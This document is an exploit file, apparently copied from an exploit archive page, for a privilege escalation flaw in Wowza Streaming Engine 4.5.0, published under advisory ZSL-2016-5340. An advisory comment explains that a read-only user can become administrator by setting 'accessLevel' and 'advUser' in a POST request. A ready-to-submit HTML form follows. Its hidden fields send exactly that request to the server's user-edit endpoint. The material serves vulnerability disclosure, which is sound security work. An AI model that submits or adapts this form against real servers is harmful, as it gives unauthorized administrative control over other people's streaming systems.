60 lines
No EOL
2 KiB
HTML
60 lines
No EOL
2 KiB
HTML
<!--
|
|
Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
|
|
|
|
|
|
Vendor: Wowza Media Systems, LLC.
|
|
Product web page: https://www.wowza.com
|
|
Affected version: 4.5.0 (build 18676)
|
|
Platform: JSP
|
|
|
|
Summary: Wowza Streaming Engine is robust, customizable, and scalable
|
|
server software that powers reliable video and audio streaming to any
|
|
device. Learn the benefits of using Wowza Streaming Engine to deliver
|
|
high-quality live and on-demand video content to any device.
|
|
|
|
Desc: The application suffers from a privilege escalation issue. Normal
|
|
user (read-only) can elevate his/her privileges by sending a POST request
|
|
seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
|
|
setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
|
|
advanced admin rights.
|
|
|
|
Advanced Admin:
|
|
Allow access to advanced properties and features
|
|
Only for expert Wowza Streaming Engine users.
|
|
|
|
Tested on: Winstone Servlet Engine v1.0.5
|
|
Servlet/2.5 (Winstone/1.0.5)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5340
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
|
|
|
|
|
|
03.07.2016
|
|
|
|
--
|
|
|
|
|
|
Privilege escalation from existing read-only user to admin(advanced):
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
|
|
<input type="hidden" name="version" value="0" />
|
|
<input type="hidden" name="action" value="quickEdit" />
|
|
<input type="hidden" name="userName" value="usermuser" />
|
|
<input type="hidden" name="userPassword" value="" />
|
|
<input type="hidden" name="userPassword2" value="" />
|
|
<input type="hidden" name="accessLevel" value="admin" />
|
|
<input type="hidden" name="advUser" value="true" />
|
|
<input type="hidden" name="_advUser" value="on" />
|
|
<input type="hidden" name="ignoreWarnings" value="false" />
|
|
<input type="submit" value="God mode" />
|
|
</form>
|
|
</body>
|
|
</html> |